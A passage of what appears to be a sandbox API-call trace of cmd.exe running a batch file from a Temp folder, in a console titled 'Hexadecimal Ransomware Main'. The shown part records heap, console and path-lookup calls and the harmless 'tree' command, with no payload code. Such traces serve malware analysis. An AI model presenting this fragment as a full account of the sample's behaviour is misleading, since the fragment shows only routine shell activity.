_Buffer="00000000") returned 8 [0103.597] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0103.597] GetProcessHeap () returned 0x1dc256b0000 [0103.597] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd250) returned 1 [0103.598] GetEnvironmentStringsW () returned 0x1dc256bd250* [0103.598] GetProcessHeap () returned 0x1dc256b0000 [0103.598] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0103.599] FreeEnvironmentStringsA (penv="=") returned 1 [0103.599] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0103.599] GetProcessHeap () returned 0x1dc256b0000 [0103.599] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0103.599] GetEnvironmentStringsW () returned 0x1dc256bd250* [0103.599] GetProcessHeap () returned 0x1dc256b0000 [0103.599] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0103.599] FreeEnvironmentStringsA (penv="=") returned 1 [0103.599] GetProcessHeap () returned 0x1dc256b0000 [0103.599] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9020) returned 1 [0103.600] DeleteProcThreadAttributeList (in: lpAttributeList=0x407419e730 | out: lpAttributeList=0x407419e730) [0103.600] ??_V@YAXPEAX@Z () returned 0x1 [0103.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.602] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0103.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.603] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0103.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.613] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0103.624] _get_osfhandle (_FileHandle=0) returned 0x4c [0103.624] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0103.651] _get_osfhandle (_FileHandle=0) returned 0x4c [0103.651] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0103.691] SetConsoleInputExeNameW () returned 0x1 [0103.691] GetConsoleOutputCP () returned 0x1b5 [0103.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0103.697] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.702] ??_V@YAXPEAX@Z () returned 0x1 [0103.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0103.704] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0103.704] _get_osfhandle (_FileHandle=3) returned 0xa0 [0103.704] SetFilePointer (in: hFile=0xa0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0103.704] GetProcessHeap () returned 0x1dc256b0000 [0103.704] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcc70) returned 1 [0103.704] GetProcessHeap () returned 0x1dc256b0000 [0103.704] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcaa0) returned 1 [0103.704] GetProcessHeap () returned 0x1dc256b0000 [0103.704] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc8d0) returned 1 [0103.704] GetProcessHeap () returned 0x1dc256b0000 [0103.704] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256e8710) returned 1 [0103.705] GetProcessHeap () returned 0x1dc256b0000 [0103.705] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b1640) returned 1 [0103.705] GetProcessHeap () returned 0x1dc256b0000 [0103.705] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d8720) returned 1 [0103.705] GetProcessHeap () returned 0x1dc256b0000 [0103.705] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc840) returned 1 [0103.705] GetProcessHeap () returned 0x1dc256b0000 [0103.705] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc670) returned 1 [0103.705] GetProcessHeap () returned 0x1dc256b0000 [0103.705] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4a0) returned 1 [0103.705] GetProcessHeap () returned 0x1dc256b0000 [0103.705] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0103.707] GetProcessHeap () returned 0x1dc256b0000 [0103.707] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0103.707] GetProcessHeap () returned 0x1dc256b0000 [0103.707] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0103.707] _get_osfhandle (_FileHandle=3) returned 0xa0 [0103.707] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0103.707] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x1aa, lpOverlapped=0x0) returned 1 [0103.709] SetFilePointer (in: hFile=0xa0, lDistanceToMove=69, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x45 [0103.709] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=6, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="tree\r\nHexadecimal Ransomware Main\r\n") returned 6 [0103.709] _get_osfhandle (_FileHandle=3) returned 0xa0 [0103.709] GetFileType (hFile=0xa0) returned 0x1 [0103.709] _get_osfhandle (_FileHandle=3) returned 0xa0 [0103.709] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x45 [0103.709] GetProcessHeap () returned 0x1dc256b0000 [0103.709] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256c0860 [0103.710] GetProcessHeap () returned 0x1dc256b0000 [0103.710] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0860) returned 1 [0103.712] _wcsicmp (_String1="tree", _String2=")") returned 75 [0103.712] _wcsicmp (_String1="FOR", _String2="tree") returned -14 [0103.712] _wcsicmp (_String1="FOR/?", _String2="tree") returned -14 [0103.712] _wcsicmp (_String1="IF", _String2="tree") returned -11 [0103.715] _wcsicmp (_String1="IF/?", _String2="tree") returned -11 [0103.715] _wcsicmp (_String1="REM", _String2="tree") returned -2 [0103.715] _wcsicmp (_String1="REM/?", _String2="tree") returned -2 [0103.715] GetProcessHeap () returned 0x1dc256b0000 [0103.715] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0103.715] GetProcessHeap () returned 0x1dc256b0000 [0103.715] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b9920 [0103.716] _tell (_FileHandle=3) returned 69 [0103.716] _close (_FileHandle=3) returned 0 [0103.716] malloc (_Size=0xffce) returned 0x1dc257e0160 [0103.717] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0103.721] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0103.723] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0103.723] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0103.724] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0103.726] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0103.726] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0103.726] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0103.728] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0103.731] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0103.731] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0103.731] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0103.732] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0103.732] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0103.732] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0103.734] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0103.734] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0103.736] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0103.736] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0103.736] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0103.736] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0103.736] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0103.736] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0103.736] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0103.736] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0103.736] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0103.736] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0103.736] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0103.736] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0103.736] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0103.736] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0103.736] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0103.737] _wcsicmp (_String1="tree", _String2="START") returned 1 [0103.737] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0103.737] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0103.737] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0103.737] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0103.737] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0103.737] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0103.737] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0103.737] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0103.737] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0103.737] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0103.737] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0103.737] malloc (_Size=0xffce) returned 0x1dc257f0140 [0103.738] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0103.739] GetProcessHeap () returned 0x1dc256b0000 [0103.739] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256d86c0 [0103.746] SetErrorMode (uMode=0x0) returned 0x0 [0103.747] SetErrorMode (uMode=0x1) returned 0x0 [0103.747] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256d86d0, lpFilePart=0x407419ecc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419ecc0*="Desktop") returned 0x17 [0103.747] SetErrorMode (uMode=0x0) returned 0x1 [0103.747] GetProcessHeap () returned 0x1dc256b0000 [0103.747] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256d86c0, Size=0x4a) returned 0x1dc256d86c0 [0103.747] GetProcessHeap () returned 0x1dc256b0000 [0103.747] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256d86c0) returned 0x4a [0103.747] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0103.748] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0103.748] GetProcessHeap () returned 0x1dc256b0000 [0103.748] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bc4a0 [0103.749] GetProcessHeap () returned 0x1dc256b0000 [0103.750] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256bc670 [0103.752] GetProcessHeap () returned 0x1dc256b0000 [0103.752] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bc670, Size=0x1be) returned 0x1dc256bc670 [0103.753] GetProcessHeap () returned 0x1dc256b0000 [0103.753] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bc670) returned 0x1be [0103.753] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0103.755] GetProcessHeap () returned 0x1dc256b0000 [0103.755] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bcf80 [0103.755] GetProcessHeap () returned 0x1dc256b0000 [0103.757] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcf80, Size=0x7e) returned 0x1dc256bcf80 [0103.757] GetProcessHeap () returned 0x1dc256b0000 [0103.757] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcf80) returned 0x7e [0103.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.757] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0103.758] GetLastError () returned 0x2 [0103.758] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.758] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0103.758] GetLastError () returned 0x2 [0103.758] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.758] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256beb40 [0103.758] FindClose (in: hFindFile=0x1dc256beb40 | out: hFindFile=0x1dc256beb40) returned 1 [0103.759] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256bf0e0 [0103.759] FindClose (in: hFindFile=0x1dc256bf0e0 | out: hFindFile=0x1dc256bf0e0) returned 1 [0103.759] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0103.759] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0103.759] ??_V@YAXPEAX@Z () returned 0x1 [0103.759] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0103.763] malloc (_Size=0xffce) returned 0x1dc257f0140 [0103.763] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0103.763] malloc (_Size=0xffce) returned 0x1dc25800120 [0103.763] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0103.764] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0103.764] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0103.764] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0103.765] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0103.765] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0103.765] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0103.765] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0103.765] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0103.765] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0103.765] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0103.765] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0103.765] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0103.765] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0103.765] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0103.765] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0103.765] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0103.765] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0103.765] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0103.765] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0103.765] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0103.765] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0103.765] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0103.765] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0103.765] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0103.765] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0103.765] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0103.765] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0103.765] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0103.765] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0103.765] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0103.765] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0103.765] _wcsicmp (_String1="tree", _String2="START") returned 1 [0103.765] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0103.766] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0103.766] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0103.766] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0103.766] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0103.766] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0103.766] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0103.766] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0103.766] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0103.766] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0103.766] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0103.766] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0103.766] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0103.766] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0103.766] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0103.766] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0103.766] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0103.766] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0103.766] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0103.766] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0103.766] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0103.766] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0103.766] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0103.766] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0103.766] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0103.766] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0103.766] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0103.766] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0103.766] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0103.766] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0103.766] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0103.766] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0103.766] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0103.766] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0103.766] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0103.766] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0103.767] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0103.767] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0103.767] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0103.767] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0103.767] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0103.767] _wcsicmp (_String1="tree", _String2="START") returned 1 [0103.767] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0103.767] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0103.767] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0103.767] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0103.767] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0103.767] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0103.767] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0103.767] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0103.767] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0103.767] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0103.767] _wcsicmp (_String1="tree", _String2="FOR") returned 14 [0103.767] _wcsicmp (_String1="tree", _String2="IF") returned 11 [0103.767] _wcsicmp (_String1="tree", _String2="REM") returned 2 [0103.767] ??_V@YAXPEAX@Z () returned 0x1 [0103.767] GetProcessHeap () returned 0x1dc256b0000 [0103.767] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xffde) returned 0x1dc256d8720 [0103.768] GetProcessHeap () returned 0x1dc256b0000 [0103.768] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256bbb60 [0103.768] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0103.768] malloc (_Size=0xffce) returned 0x1dc25800120 [0103.768] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0103.768] GetProcessHeap () returned 0x1dc256b0000 [0103.768] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256e8710 [0103.773] SetErrorMode (uMode=0x0) returned 0x0 [0103.773] SetErrorMode (uMode=0x1) returned 0x0 [0103.773] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256e8720, lpFilePart=0x407419e520 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e520*="Desktop") returned 0x17 [0103.773] SetErrorMode (uMode=0x0) returned 0x1 [0103.773] GetProcessHeap () returned 0x1dc256b0000 [0103.773] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256e8710, Size=0x4a) returned 0x1dc256e8710 [0103.776] GetProcessHeap () returned 0x1dc256b0000 [0103.776] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256e8710) returned 0x4a [0103.776] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0103.776] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0103.777] GetProcessHeap () returned 0x1dc256b0000 [0103.777] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bdbb0 [0103.777] GetProcessHeap () returned 0x1dc256b0000 [0103.777] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256bc840 [0103.777] GetProcessHeap () returned 0x1dc256b0000 [0103.777] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bc840, Size=0x1be) returned 0x1dc256bc840 [0103.777] GetProcessHeap () returned 0x1dc256b0000 [0103.777] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bc840) returned 0x1be [0103.777] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0103.777] GetProcessHeap () returned 0x1dc256b0000 [0103.777] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bca10 [0103.777] GetProcessHeap () returned 0x1dc256b0000 [0103.778] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bca10, Size=0x7e) returned 0x1dc256bca10 [0103.778] GetProcessHeap () returned 0x1dc256b0000 [0103.778] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bca10) returned 0x7e [0103.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.778] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0103.778] GetLastError () returned 0x2 [0103.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.779] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0103.783] GetLastError () returned 0x2 [0103.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.783] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256bf0e0 [0103.783] FindClose (in: hFindFile=0x1dc256bf0e0 | out: hFindFile=0x1dc256bf0e0) returned 1 [0103.783] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256bec60 [0103.783] FindClose (in: hFindFile=0x1dc256bec60 | out: hFindFile=0x1dc256bec60) returned 1 [0103.784] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0103.784] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0103.784] ??_V@YAXPEAX@Z () returned 0x1 [0103.784] GetConsoleTitleW (in: lpConsoleTitle=0x407419e810, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0103.806] InitializeProcThreadAttributeList (in: lpAttributeList=0x407419e730, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x407419e620 | out: lpAttributeList=0x407419e730, lpSize=0x407419e620) returned 1 [0103.806] UpdateProcThreadAttribute (in: lpAttributeList=0x407419e730, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e60c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x407419e730, lpPreviousValue=0x0) returned 1 [0103.806] GetStartupInfoW (in: lpStartupInfo=0x407419e6c0 | out: lpStartupInfo=0x407419e6c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 